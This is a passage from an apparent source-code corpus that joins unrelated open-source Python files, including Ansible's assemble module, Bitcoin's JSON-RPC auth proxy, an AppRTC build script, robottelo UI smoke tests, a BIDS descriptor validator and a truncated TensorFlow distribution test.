required: false default: null version_added: "2.0" author: "Stephen Fromm (@sfromm)" extends_documentation_fragment: - files ''' EXAMPLES = ''' # Example from Ansible Playbooks - assemble: src=/etc/someapp/fragments dest=/etc/someapp/someapp.conf # When a delimiter is specified, it will be inserted in between each fragment - assemble: src=/etc/someapp/fragments dest=/etc/someapp/someapp.conf delimiter='### START FRAGMENT ###' # Copy a new "sshd_config" file into place, after passing validation with sshd - assemble: src=/etc/ssh/conf.d/ dest=/etc/ssh/sshd_config validate='/usr/sbin/sshd -t -f %s' ''' # =========================================== # Support method def assemble_from_fragments(src_path, delimiter=None, compiled_regexp=None, ignore_hidden=False): ''' assemble a file from a directory of fragments ''' tmpfd, temp_path = tempfile.mkstemp() tmp = os.fdopen(tmpfd,'w') delimit_me = False add_newline = False for f in sorted(os.listdir(src_path)): if compiled_regexp and not compiled_regexp.search(f): continue fragment = "%s/%s" % (src_path, f) if not os.path.isfile(fragment) or (ignore_hidden and os.path.basename(fragment).startswith('.')): continue fragment_content = file(fragment).read() # always put a newline between fragments if the previous fragment didn't end with a newline. 
if add_newline: tmp.write('\n') # delimiters should only appear between fragments if delimit_me: if delimiter: # un-escape anything like newlines delimiter = delimiter.decode('unicode-escape') tmp.write(delimiter) # always make sure there's a newline after the # delimiter, so lines don't run together if delimiter[-1] != '\n': tmp.write('\n') tmp.write(fragment_content) delimit_me = True if fragment_content.endswith('\n'): add_newline = False else: add_newline = True tmp.close() return temp_path # ============================================================== # main def main(): module = AnsibleModule( # not checking because of daisy chain to file module argument_spec = dict( src = dict(required=True), delimiter = dict(required=False), dest = dict(required=True), backup=dict(default=False, type='bool'), remote_src=dict(default=False, type='bool'), regexp = dict(required=False), ignore_hidden = dict(default=False, type='bool'), validate = dict(required=False, type='str'), ), add_file_common_args=True ) changed = False path_md5 = None # Deprecated path_hash = None dest_hash = None src = os.path.expanduser(module.params['src']) dest = os.path.expanduser(module.params['dest']) backup = module.params['backup'] delimiter = module.params['delimiter'] regexp = module.params['regexp'] compiled_regexp = None ignore_hidden = module.params['ignore_hidden'] validate = module.params.get('validate', None) if not os.path.exists(src): module.fail_json(msg="Source (%s) does not exist" % src) if not os.path.isdir(src): module.fail_json(msg="Source (%s) is not a directory" % src) if regexp != None: try: compiled_regexp = re.compile(regexp) except re.error, e: module.fail_json(msg="Invalid Regexp (%s) in \"%s\"" % (e, regexp)) path = assemble_from_fragments(src, delimiter, compiled_regexp, ignore_hidden) path_hash = module.sha1(path) if os.path.exists(dest): dest_hash = module.sha1(dest) if path_hash != dest_hash: if backup and dest_hash is not None: module.backup_local(dest) if 
validate: if "%s" not in validate: module.fail_json(msg="validate must contain %%s: %s" % validate) (rc, out, err) = module.run_command(validate % path) if rc != 0: module.fail_json(msg="failed to validate: rc:%s error:%s" % (rc, err)) shutil.copy(path, dest) changed = True # Backwards compat. This won't return data if FIPS mode is active try: pathmd5 = module.md5(path) except ValueError: pathmd5 = None os.remove(path) file_args = module.load_file_common_arguments(module.params) changed = module.set_fs_attributes_if_different(file_args, changed) # Mission complete module.exit_json(src=src, dest=dest, md5sum=pathmd5, checksum=path_hash, changed=changed, msg="OK") # import module snippets from ansible.module_utils.basic import * main()
gpl-3.0
CryptArc/bitcoin
test/functional/test_framework/authproxy.py
16
8667
# Copyright (c) 2011 Jeff Garzik # # Previous copyright, from python-jsonrpc/jsonrpc/proxy.py: # # Copyright (c) 2007 Jan-Klaas Kollhof # # This file is part of jsonrpc. # # jsonrpc is free software; you can redistribute it and/or modify # it under the terms of the GNU Lesser General Public License as published by # the Free Software Foundation; either version 2.1 of the License, or # (at your option) any later version. # # This software is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public License # along with this software; if not, write to the Free Software # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA """HTTP proxy for opening RPC connection to bitcoind. AuthServiceProxy has the following improvements over python-jsonrpc's ServiceProxy class: - HTTP connections persist for the life of the AuthServiceProxy object (if server supports HTTP/1.1) - sends protocol 'version', per JSON-RPC 1.1 - sends proper, incrementing 'id' - sends Basic HTTP authentication headers - parses all JSON numbers that look like floats as Decimal - uses standard Python json lib """ import base64 import decimal from http import HTTPStatus import http.client import json import logging import os import socket import time import urllib.parse HTTP_TIMEOUT = 30 USER_AGENT = "AuthServiceProxy/0.1" log = logging.getLogger("BitcoinRPC") class JSONRPCException(Exception): def __init__(self, rpc_error, http_status=None): try: errmsg = '%(message)s (%(code)i)' % rpc_error except (KeyError, TypeError): errmsg = '' super().__init__(errmsg) self.error = rpc_error self.http_status = http_status def EncodeDecimal(o): if isinstance(o, decimal.Decimal): return str(o) raise TypeError(repr(o) + " is not JSON serializable") class 
AuthServiceProxy(): __id_count = 0 # ensure_ascii: escape unicode as \uXXXX, passed to json.dumps def __init__(self, service_url, service_name=None, timeout=HTTP_TIMEOUT, connection=None, ensure_ascii=True): self.__service_url = service_url self._service_name = service_name self.ensure_ascii = ensure_ascii # can be toggled on the fly by tests self.__url = urllib.parse.urlparse(service_url) user = None if self.__url.username is None else self.__url.username.encode('utf8') passwd = None if self.__url.password is None else self.__url.password.encode('utf8') authpair = user + b':' + passwd self.__auth_header = b'Basic ' + base64.b64encode(authpair) self.timeout = timeout self._set_conn(connection) def __getattr__(self, name): if name.startswith('__') and name.endswith('__'): # Python internal stuff raise AttributeError if self._service_name is not None: name = "%s.%s" % (self._service_name, name) return AuthServiceProxy(self.__service_url, name, connection=self.__conn) def _request(self, method, path, postdata): ''' Do a HTTP request, with retry if we get disconnected (e.g. due to a timeout). This is a workaround for https://bugs.python.org/issue3566 which is fixed in Python 3.5. 
''' headers = {'Host': self.__url.hostname, 'User-Agent': USER_AGENT, 'Authorization': self.__auth_header, 'Content-type': 'application/json'} if os.name == 'nt': # Windows somehow does not like to re-use connections # TODO: Find out why the connection would disconnect occasionally and make it reusable on Windows self._set_conn() try: self.__conn.request(method, path, postdata, headers) return self._get_response() except http.client.BadStatusLine as e: if e.line == "''": # if connection was closed, try again self.__conn.close() self.__conn.request(method, path, postdata, headers) return self._get_response() else: raise except (BrokenPipeError, ConnectionResetError): # Python 3.5+ raises BrokenPipeError instead of BadStatusLine when the connection was reset # ConnectionResetError happens on FreeBSD with Python 3.4 self.__conn.close() self.__conn.request(method, path, postdata, headers) return self._get_response() def get_request(self, *args, **argsn): AuthServiceProxy.__id_count += 1 log.debug("-{}-> {} {}".format( AuthServiceProxy.__id_count, self._service_name, json.dumps(args or argsn, default=EncodeDecimal, ensure_ascii=self.ensure_ascii), )) if args and argsn: raise ValueError('Cannot handle both named and positional arguments') return {'version': '1.1', 'method': self._service_name, 'params': args or argsn, 'id': AuthServiceProxy.__id_count} def __call__(self, *args, **argsn): postdata = json.dumps(self.get_request(*args, **argsn), default=EncodeDecimal, ensure_ascii=self.ensure_ascii) response, status = self._request('POST', self.__url.path, postdata.encode('utf-8')) if response['error'] is not None: raise JSONRPCException(response['error'], status) elif 'result' not in response: raise JSONRPCException({ 'code': -343, 'message': 'missing JSON-RPC result'}, status) elif status != HTTPStatus.OK: raise JSONRPCException({ 'code': -342, 'message': 'non-200 HTTP status code but no JSON-RPC error'}, status) else: return response['result'] def batch(self, 
rpc_call_list): postdata = json.dumps(list(rpc_call_list), default=EncodeDecimal, ensure_ascii=self.ensure_ascii) log.debug("--> " + postdata) response, status = self._request('POST', self.__url.path, postdata.encode('utf-8')) if status != HTTPStatus.OK: raise JSONRPCException({ 'code': -342, 'message': 'non-200 HTTP status code but no JSON-RPC error'}, status) return response def _get_response(self): req_start_time = time.time() try: http_response = self.__conn.getresponse() except socket.timeout: raise JSONRPCException({ 'code': -344, 'message': '%r RPC took longer than %f seconds. Consider ' 'using larger timeout for calls that take ' 'longer to return.' % (self._service_name, self.__conn.timeout)}) if http_response is None: raise JSONRPCException({ 'code': -342, 'message': 'missing HTTP response from server'}) content_type = http_response.getheader('Content-Type') if content_type != 'application/json': raise JSONRPCException( {'code': -342, 'message': 'non-JSON HTTP response with \'%i %s\' from server' % (http_response.status, http_response.reason)}, http_response.status) responsedata = http_response.read().decode('utf8') response = json.loads(responsedata, parse_float=decimal.Decimal) elapsed = time.time() - req_start_time if "error" in response and response["error"] is None: log.debug("<-%s- [%.6f] %s" % (response["id"], elapsed, json.dumps(response["result"], default=EncodeDecimal, ensure_ascii=self.ensure_ascii))) else: log.debug("<-- [%.6f] %s" % (elapsed, responsedata)) return response, http_response.status def __truediv__(self, relative_uri): return AuthServiceProxy("{}/{}".format(self.__service_url, relative_uri), self._service_name, connection=self.__conn) def _set_conn(self, connection=None): port = 80 if self.__url.port is None else self.__url.port if connection: self.__conn = connection self.timeout = connection.timeout elif self.__url.scheme == 'https': self.__conn = http.client.HTTPSConnection(self.__url.hostname, port, timeout=self.timeout) else: 
self.__conn = http.client.HTTPConnection(self.__url.hostname, port, timeout=self.timeout)
mit
smadhusu/AppRTC
build/build_app_engine_package.py
21
3488
#!/usr/bin/python """Build App Engine source package. """ import json import optparse import os import shutil import subprocess import sys import test_file_herder USAGE = """%prog src_path dest_path Build the GAE source code package. src_path Path to the source code root directory. dest_path Path to the root directory to push/deploy GAE from.""" def call_cmd_and_return_output_lines(cmd): try: process = subprocess.Popen(cmd, stdout=subprocess.PIPE) output = process.communicate()[0] return output.split('\n') except OSError as e: print str(e) return [] def build_version_info_file(dest_path): """Build the version info JSON file.""" version_info = { 'gitHash': None, 'time': None, 'branch': None } lines = call_cmd_and_return_output_lines(['git', 'log', '-1']) for line in lines: if line.startswith('commit'): version_info['gitHash'] = line.partition(' ')[2].strip() elif line.startswith('Date'): version_info['time'] = line.partition(':')[2].strip() if version_info['gitHash'] is not None and version_info['time'] is not None: break lines = call_cmd_and_return_output_lines(['git', 'branch']) for line in lines: if line.startswith('*'): version_info['branch'] = line.partition(' ')[2].strip() break try: with open(dest_path, 'w') as f: f.write(json.dumps(version_info)) except IOError as e: print str(e) def CopyApprtcSource(src_path, dest_path): if os.path.exists(dest_path): shutil.rmtree(dest_path) os.makedirs(dest_path) simply_copy_subdirs = ['bigquery', 'css', 'images', 'third_party'] for dirpath, unused_dirnames, files in os.walk(src_path): for subdir in simply_copy_subdirs: if dirpath.endswith(subdir): shutil.copytree(dirpath, os.path.join(dest_path, subdir)) if dirpath.endswith('html'): dest_html_path = os.path.join(dest_path, 'html') os.makedirs(dest_html_path) for name in files: # Template files must be in the root directory. 
if name.endswith('_template.html'): shutil.copy(os.path.join(dirpath, name), dest_path) else: shutil.copy(os.path.join(dirpath, name), dest_html_path) elif dirpath.endswith('app_engine'): for name in files: if (name.endswith('.py') and 'test' not in name or name.endswith('.yaml')): shutil.copy(os.path.join(dirpath, name), dest_path) elif dirpath.endswith('js'): for name in files: # loopback.js is not compiled by Closure and needs to be copied # separately. if name == 'loopback.js': dest_js_path = os.path.join(dest_path, 'js') os.makedirs(dest_js_path) shutil.copy(os.path.join(dirpath, name), dest_js_path) break build_version_info_file(os.path.join(dest_path, 'version_info.json')) def main(): parser = optparse.OptionParser(USAGE) parser.add_option("-t", "--include-tests", action="store_true", help='Also copy python tests to the out dir.') options, args = parser.parse_args() if len(args) != 2: parser.error('Error: Exactly 2 arguments required.') src_path, dest_path = args[0:2] CopyApprtcSource(src_path, dest_path) if options.include_tests: app_engine_code = os.path.join(src_path, 'app_engine') test_file_herder.CopyTests(os.path.join(src_path, 'app_engine'), dest_path) if __name__ == '__main__': sys.exit(main())
bsd-3-clause
blrm/robottelo
tests/foreman/smoke/test_ui_smoke.py
2
19258
"""Smoke tests for the ``UI`` end-to-end scenario.""" from fauxfactory import gen_string, gen_ipaddr from robottelo import manifests from robottelo.config import settings from robottelo.constants import ( ANY_CONTEXT, DEFAULT_LOC, DEFAULT_ORG, DEFAULT_SUBSCRIPTION_NAME, DOMAIN, FAKE_0_PUPPET_REPO, FOREMAN_PROVIDERS, GOOGLE_CHROME_REPO, LIBVIRT_RESOURCE_URL, PRDS, REPOS, REPOSET, REPO_TYPE, RHVA_REPO_TREE, SAT6_TOOLS_TREE, FAKE_6_PUPPET_REPO, ) from robottelo.decorators import bz_bug_is_open, skip_if_not_set from robottelo.test import UITestCase from robottelo.ui.factory import ( make_activationkey, make_contentview, make_domain, make_hostgroup, make_lifecycle_environment, make_org, make_product, make_repository, make_resource, make_subnet, make_user, set_context, ) from robottelo.ui.locators import common_locators from robottelo.ui.session import Session from robottelo.vm import VirtualMachine class SmokeTestCase(UITestCase): """End-to-end tests using the ``WebUI``.""" def test_positive_find_default_org(self): """@Test: Check if :data:`robottelo.constants.DEFAULT_ORG` is present @Feature: Smoke Test @Assert: 'Default Organization' is found """ with Session(self.browser) as session: self.assertEqual( session.nav.go_to_select_org(DEFAULT_ORG), DEFAULT_ORG ) def test_positive_find_default_loc(self): """@Test: Check if :data:`robottelo.constants.DEFAULT_LOC` is present @Feature: Smoke Test @Assert: 'Default Location' is found """ with Session(self.browser) as session: self.assertEqual( session.nav.go_to_select_loc(DEFAULT_LOC), DEFAULT_LOC ) def test_positive_find_admin_user(self): """Check if Admin User is present @Feature: Smoke Test @Assert: Admin User is found and has Admin role """ with Session(self.browser): self.assertTrue(self.user.user_admin_role_toggle('admin')) def test_positive_smoke(self): """Check that basic content can be created * Create a new user with admin permissions * Using the new user from above: * Create a new organization * Create two new 
lifecycle environments * Create a custom product * Create a custom YUM repository * Create a custom PUPPET repository * Synchronize both custom repositories * Create a new content view * Associate both repositories to new content view * Publish content view * Promote content view to both lifecycles * Create a new libvirt compute resource * Create a new subnet * Create a new domain * Create a new hostgroup and associate previous entities to it @Feature: Smoke Test @Assert: All entities are created and associated. """ user_name = gen_string('alpha') password = gen_string('alpha') org_name = gen_string('alpha') env_1_name = gen_string('alpha') env_2_name = gen_string('alpha') product_name = gen_string('alpha') yum_repository_name = gen_string('alpha') puppet_repository_name = gen_string('alpha') cv_name = gen_string('alpha') compute_resource_name = gen_string('alpha') subnet_name = gen_string('alpha') domain_name = gen_string('alpha') domain = DOMAIN % domain_name hostgroup_name = gen_string('alpha') # Create new user with admin permissions with Session(self.browser) as session: make_user( session, username=user_name, password1=password, password2=password ) self.assertIsNotNone(self.user.search(user_name)) self.assertTrue(self.user.user_admin_role_toggle(user_name)) # FIX ME: UI doesn't authenticate user created via UI auto: Issue #1152 # Once #1152 is fixed; need to pass user_name and password to Session with Session(self.browser) as session: # Create New organization make_org(session, org_name=org_name) self.assertIsNotNone(self.org.search(org_name)) # Create New Lifecycle environment1 make_lifecycle_environment(session, org=org_name, name=env_1_name) self.assertIsNotNone(self.lifecycleenvironment.search(env_1_name)) # Create New Lifecycle environment2 make_lifecycle_environment( session, org=org_name, name=env_2_name, prior=env_1_name ) self.assertIsNotNone(self.lifecycleenvironment.search(env_2_name)) # Create custom product make_product(session, org=org_name, 
name=product_name) product = self.products.search(product_name) self.assertIsNotNone(product) # Create a YUM repository product.click() make_repository( session, name=yum_repository_name, url=GOOGLE_CHROME_REPO ) self.assertIsNotNone(self.repository.search(yum_repository_name)) # Create a puppet Repository self.products.search(product_name).click() make_repository( session, name=puppet_repository_name, url=FAKE_0_PUPPET_REPO, repo_type=REPO_TYPE['puppet'] ) self.assertIsNotNone(self.repository.search( puppet_repository_name )) # Sync YUM and puppet repository self.navigator.go_to_sync_status() self.assertIsNotNone(self.sync.sync_custom_repos( product_name, [yum_repository_name, puppet_repository_name] )) # Create new content-view make_contentview(session, org=org_name, name=cv_name) self.assertIsNotNone(self.content_views.search(cv_name)) # Add YUM repository to content-view self.content_views.add_remove_repos(cv_name, [yum_repository_name]) if not bz_bug_is_open(1191422): self.assertIsNotNone(self.content_views.wait_until_element( common_locators['alert.success'] )) # Add puppet-module to content-view if not bz_bug_is_open(1297308): self.content_views.add_puppet_module( cv_name, 'httpd', filter_term='Latest' ) # Publish content-view self.content_views.publish(cv_name) if not bz_bug_is_open(1191422): self.assertIsNotNone(self.content_views.wait_until_element( common_locators['alert.success'] )) # Promote content-view to life-cycle environment 1 self.content_views.promote( cv_name, version='Version 1', env=env_1_name) if not bz_bug_is_open(1191422): self.assertIsNotNone(self.content_views.wait_until_element( common_locators['alert.success'] )) # Promote content-view to life-cycle environment 2 self.content_views.promote( cv_name, version='Version 1', env=env_2_name) if not bz_bug_is_open(1191422): self.assertIsNotNone(self.content_views.wait_until_element( common_locators['alert.success'] )) # Create a new libvirt compute resource url = ( LIBVIRT_RESOURCE_URL % 
settings.server.hostname ) make_resource( session, org=org_name, name=compute_resource_name, provider_type=FOREMAN_PROVIDERS['libvirt'], parameter_list=[['URL', url, 'field']], ) self.assertIsNotNone( self.compute_resource.search(compute_resource_name)) # Create a subnet make_subnet( session, org=org_name, subnet_name=subnet_name, subnet_network=gen_ipaddr(ip3=True), subnet_mask='255.255.255.0' ) self.assertIsNotNone(self.subnet.search(subnet_name)) # Create a Domain make_domain( session, org=org_name, name=domain, description=domain ) self.assertIsNotNone(self.domain.search(domain)) # Create a HostGroup make_hostgroup(session, name=hostgroup_name) self.assertIsNotNone(self.hostgroup.search(hostgroup_name)) @skip_if_not_set('clients') def test_positive_end_to_end(self): """Perform end to end smoke tests using RH repos. @Feature: Smoke test @Assert: All tests should succeed and Content should be successfully fetched by client """ org_name = gen_string('alpha', 6) cv_name = gen_string('alpha', 6) activation_key_name = gen_string('alpha', 6) env_name = gen_string('alpha', 6) repos = self.sync.create_repos_tree(RHVA_REPO_TREE) with Session(self.browser) as session: # Create New organization make_org(session, org_name=org_name) self.assertIsNotNone(self.org.search(org_name)) # Create New Lifecycle environment make_lifecycle_environment(session, org=org_name, name=env_name) self.assertIsNotNone(self.lifecycleenvironment.search(env_name)) # Navigate UI to select org and redhat subscription page session.nav.go_to_select_org(org_name) session.nav.go_to_red_hat_subscriptions() # Upload manifest from webui with manifests.clone() as manifest: self.subscriptions.upload(manifest) self.assertTrue(session.nav.wait_until_element( common_locators['alert.success'] )) session.nav.go_to_red_hat_repositories() # List of dictionary passed to enable the redhat repos # It selects Product->Reposet-> Repo self.sync.enable_rh_repos(repos) session.nav.go_to_sync_status() # Sync the repos # 
syn.sync_rh_repos returns boolean values and not objects self.assertTrue(self.sync.sync_rh_repos(repos)) # Create new content-view make_contentview(session, org=org_name, name=cv_name) self.assertIsNotNone(self.content_views.search(cv_name)) # Add YUM repository to content-view self.content_views.add_remove_repos( cv_name, [REPOS['rhva65']['name'], REPOS['rhva6']['name']] ) if not bz_bug_is_open(1191422): self.assertIsNotNone(self.content_views.wait_until_element( common_locators['alert.success'] )) # Publish content-view self.content_views.publish(cv_name) if not bz_bug_is_open(1191422): self.assertIsNotNone(self.content_views.wait_until_element( common_locators['alert.success'] )) # Promote content-view to life-cycle environment 1 self.content_views.promote( cv_name, version='Version 1', env=env_name) if not bz_bug_is_open(1191422): self.assertIsNotNone(self.content_views.wait_until_element( common_locators['alert.success'] )) # Create Activation-Key make_activationkey( session, org=org_name, name=activation_key_name, env=env_name, content_view=cv_name ) self.activationkey.associate_product( activation_key_name, [DEFAULT_SUBSCRIPTION_NAME]) self.activationkey.enable_repos( activation_key_name, [REPOSET['rhva6']]) if not bz_bug_is_open(1191541): self.assertIsNotNone(self.activationkey.wait_until_element( common_locators['alert.success'] )) # Create VM with VirtualMachine(distro='rhel66') as vm: vm.install_katello_ca() result = vm.register_contenthost(activation_key_name, org_name) self.assertEqual(result.return_code, 0) # Install contents from sat6 server package_name = 'python-kitchen' result = vm.run(u'yum install -y {0}'.format(package_name)) self.assertEqual(result.return_code, 0) # Verify if package is installed by query it result = vm.run(u'rpm -q {0}'.format(package_name)) self.assertEqual(result.return_code, 0) @skip_if_not_set('clients') def test_positive_puppet_install(self): """Perform puppet end to end smoke tests using RH repos. 
@Feature: Smoke test puppet install and configure on client @Assert: Client should get configured by puppet-module. """ activation_key_name = gen_string('alpha') cv_name = gen_string('alpha') env_name = gen_string('alpha') org_name = gen_string('alpha') product_name = gen_string('alpha') puppet_module = 'motd' puppet_repository_name = gen_string('alpha') repos = self.sync.create_repos_tree(SAT6_TOOLS_TREE) rhel_prd = DEFAULT_SUBSCRIPTION_NAME rhel6_repo = settings.rhel6_repo with Session(self.browser) as session: # Create New organization make_org(session, org_name=org_name) self.assertIsNotNone(self.org.search(org_name)) # Create New Lifecycle environment make_lifecycle_environment(session, org=org_name, name=env_name) self.assertIsNotNone(self.lifecycleenvironment.search(env_name)) session.nav.go_to_red_hat_subscriptions() # Upload manifest from webui with manifests.clone() as manifest: self.subscriptions.upload(manifest) self.assertTrue(session.nav.wait_until_element( common_locators['alert.success'] )) session.nav.go_to_red_hat_repositories() # List of dictionary passed to enable the redhat repos # It selects Product->Reposet-> Repo self.sync.enable_rh_repos(repos) session.nav.go_to_sync_status() # Sync the repos # syn.sync_rh_repos returns boolean values and not objects self.assertTrue(self.sync.sync_noversion_rh_repos( PRDS['rhel'], [REPOS['rhst6']['name']] )) # Create custom product make_product(session, org=org_name, name=product_name) product = self.products.search(product_name) self.assertIsNotNone(product) # Create a puppet Repository product.click() make_repository( session, name=puppet_repository_name, url=FAKE_6_PUPPET_REPO, repo_type=REPO_TYPE['puppet'] ) self.assertIsNotNone(self.repository.search( puppet_repository_name )) # Sync the repos # syn.sync_rh_repos returns boolean values and not objects session.nav.go_to_sync_status() self.assertIsNotNone(self.sync.sync_custom_repos( product_name, [puppet_repository_name] )) # Create new content-view 
make_contentview(session, org=org_name, name=cv_name) self.assertIsNotNone(self.content_views.search(cv_name)) # Add YUM repository to content-view self.content_views.add_remove_repos( cv_name, [REPOS['rhst6']['name']], ) if not bz_bug_is_open(1191422): self.assertIsNotNone(self.content_views.wait_until_element( common_locators['alert.success'] )) # Add puppet-module to content-view self.content_views.add_puppet_module( cv_name, puppet_module, filter_term='Latest') # Publish content-view self.content_views.publish(cv_name) if not bz_bug_is_open(1191422): self.assertIsNotNone(self.content_views.wait_until_element( common_locators['alert.success'] )) # Promote content-view to life-cycle environment. self.content_views.promote( cv_name, version='Version 1', env=env_name) if not bz_bug_is_open(1191422): self.assertIsNotNone(self.content_views.wait_until_element( common_locators['alert.success'] )) # Create Activation-Key make_activationkey( session, org=org_name, name=activation_key_name, env=env_name, content_view=cv_name ) self.activationkey.associate_product( activation_key_name, [product_name, rhel_prd]) self.activationkey.enable_repos( activation_key_name, [REPOSET['rhst6']] ) if not bz_bug_is_open(1191541): self.assertIsNotNone(self.activationkey.wait_until_element( common_locators['alert.success'] )) # Create VM with VirtualMachine(distro='rhel67') as vm: vm.install_katello_ca() vm.register_contenthost(activation_key_name, org_name) vm.configure_puppet(rhel6_repo) host = vm.hostname set_context(session, org=ANY_CONTEXT['org']) session.nav.go_to_hosts() self.hosts.update_host_bulkactions(host=host, org=org_name) self.hosts.update( name=host, lifecycle_env=env_name, cv=cv_name, reset_puppetenv=True, ) session.nav.go_to_hosts() self.hosts.update( name=host, reset_puppetenv=False, puppet_module=puppet_module ) vm.run(u'puppet agent -t') result = vm.run(u'cat /etc/motd | grep FQDN') self.assertEqual(result.return_code, 0)
gpl-3.0
boutiques/schema
tools/python/boutiques/bids.py
2
2608
#!/usr/bin/env python import re import simplejson import os.path as op from boutiques.validator import DescriptorValidationError from boutiques.logger import raise_error, print_info # BIDS validation module def validate_bids(descriptor, valid=False): if not valid: msg = "Please provide a Boutiques descriptor that has been validated." raise_error(DescriptorValidationError, msg) errors = [] # TODO: verify not only that all fields/keys exist, their properties, too # Ensure the command-line conforms to the BIDS app spec msg_template = " CLIError: command-line doesn't match template: {}" cltemp = r"mkdir -p \[OUTPUT_DIR\]; (.*) \[BIDS_DIR\] \[OUTPUT_DIR\]"\ r" \[ANALYSIS_LEVEL\] \[PARTICIPANT_LABEL\] \[SESSION_LABEL\]"\ r"[\\s]*(.*)" cmdline = descriptor["command-line"] if len(re.findall(cltemp, cmdline)) < 1: errors += [msg_template.format(cltemp)] # Verify IDs are present which link to the OUTPUT_DIR # key bot as File and String ftypes = set(["File", "String"]) msg_template = " OutError: \"{}\" types for outdir do not match \"{}\"" outtypes = set([inp["type"] for inp in descriptor["inputs"] if inp["value-key"] == "[OUTPUT_DIR]"]) if outtypes != ftypes: errors += [msg_template.format(", ".join(outtypes), ", ".join(ftypes))] # Verify that analysis levels is an enumerable with some # subset of "paricipant", "session", and "group" choices = ["session", "participant", "group"] msg_template = " LevelError: \"{}\" is not a valid analysis level" alevels = [inp["value-choices"] for inp in descriptor["inputs"] if inp["value-key"] == "[ANALYSIS_LEVEL]"][0] errors += [msg_template.format(lv) for lv in alevels if lv not in choices] # Verify there is only a single output defined (the directory) msg_template = "OutputError: 0 or multiple outputs defined" if len(descriptor["output-files"]) != 1: errors += [msg_template] else: # Verify that the output shows up as an output msg_template = "OutputError: OUTPUT_DIR is not represented as an output" if 
descriptor["output-files"][0]["path-template"] != "[OUTPUT_DIR]": errors += [msg_template] errors = None if errors == [] else errors if errors is None: print_info("BIDS validation OK") else: raise_error(DescriptorValidationError, "Invalid BIDS app descriptor:" "\n"+"\n".join(errors))
gpl-2.0
jendap/tensorflow
tensorflow/contrib/distributions/python/kernel_tests/vector_sinh_arcsinh_diag_test.py
25
10036
# Copyright 2017 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Tests for VectorSinhArcsinhDiag.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import numpy as np from tensorflow.contrib import distributions from tensorflow.contrib.distributions.python.ops import test_util from tensorflow.python.platform import test ds = distributions rng = np.random.RandomState(123) class VectorSinhArcsinhDiagTest(test_util.VectorDistributionTestHelpers, test.TestCase): def test_default_is_same_as_normal(self): d = 10 scale_diag = rng.rand(d) scale_identity_multiplier = np.float64(1.0) loc = rng.randn(d) with self.cached_session() as sess: norm = ds.MultivariateNormalDiag( loc=loc, scale_diag=scale_diag, scale_identity_multiplier=scale_identity_multiplier, validate_args=True) sasnorm = ds.VectorSinhArcsinhDiag( loc=loc, scale_diag=scale_diag, scale_identity_multiplier=scale_identity_multiplier, validate_args=True) x = rng.randn(5, d) norm_pdf, sasnorm_pdf = sess.run([norm.prob(x), sasnorm.prob(x)]) self.assertAllClose(norm_pdf, sasnorm_pdf) norm_samps, sasnorm_samps = sess.run( [norm.sample(10000, seed=0), sasnorm.sample(10000, seed=0)]) self.assertAllClose(loc, sasnorm_samps.mean(axis=0), atol=0.1) self.assertAllClose( norm_samps.mean(axis=0), sasnorm_samps.mean(axis=0), atol=0.1) self.assertAllClose( 
norm_samps.std(axis=0), sasnorm_samps.std(axis=0), atol=0.1) def test_passing_in_laplace_plus_defaults_is_same_as_laplace(self): d = 10 scale_diag = rng.rand(d) scale_identity_multiplier = np.float64(1.2) loc = rng.randn(d) with self.cached_session() as sess: vlap = ds.VectorLaplaceDiag( loc=loc, scale_diag=scale_diag, scale_identity_multiplier=scale_identity_multiplier, validate_args=True) sasvlap = ds.VectorSinhArcsinhDiag( loc=loc, scale_diag=scale_diag, scale_identity_multiplier=scale_identity_multiplier, distribution=ds.Laplace(np.float64(0.), np.float64(1.)), validate_args=True) x = rng.randn(5, d) vlap_pdf, sasvlap_pdf = sess.run([vlap.prob(x), sasvlap.prob(x)]) self.assertAllClose(vlap_pdf, sasvlap_pdf) vlap_samps, sasvlap_samps = sess.run( [vlap.sample(10000, seed=0), sasvlap.sample(10000, seed=0)]) self.assertAllClose(loc, sasvlap_samps.mean(axis=0), atol=0.1) self.assertAllClose( vlap_samps.mean(axis=0), sasvlap_samps.mean(axis=0), atol=0.1) self.assertAllClose( vlap_samps.std(axis=0), sasvlap_samps.std(axis=0), atol=0.1) def test_tailweight_small_gives_fewer_outliers_than_normal(self): d = 10 scale_diag = rng.rand(d) scale_identity_multiplier = np.float64(0.9) loc = rng.randn(d) with self.cached_session() as sess: norm = ds.MultivariateNormalDiag( loc=loc, scale_diag=scale_diag, scale_identity_multiplier=scale_identity_multiplier, validate_args=True) sasnorm = ds.VectorSinhArcsinhDiag( loc=loc, scale_diag=scale_diag, scale_identity_multiplier=scale_identity_multiplier, tailweight=0.1, validate_args=True) # sasnorm.pdf(x) is smaller on outliers (+-10 are outliers) x = np.float64([[-10] * d, [10] * d]) # Shape [2, 10] norm_lp, sasnorm_lp = sess.run([norm.log_prob(x), sasnorm.log_prob(x)]) np.testing.assert_array_less(sasnorm_lp, norm_lp) # 0.1% quantile and 99.9% quantile are outliers, and should be more # extreme in the normal. The 97.772% quantiles should be the same. 
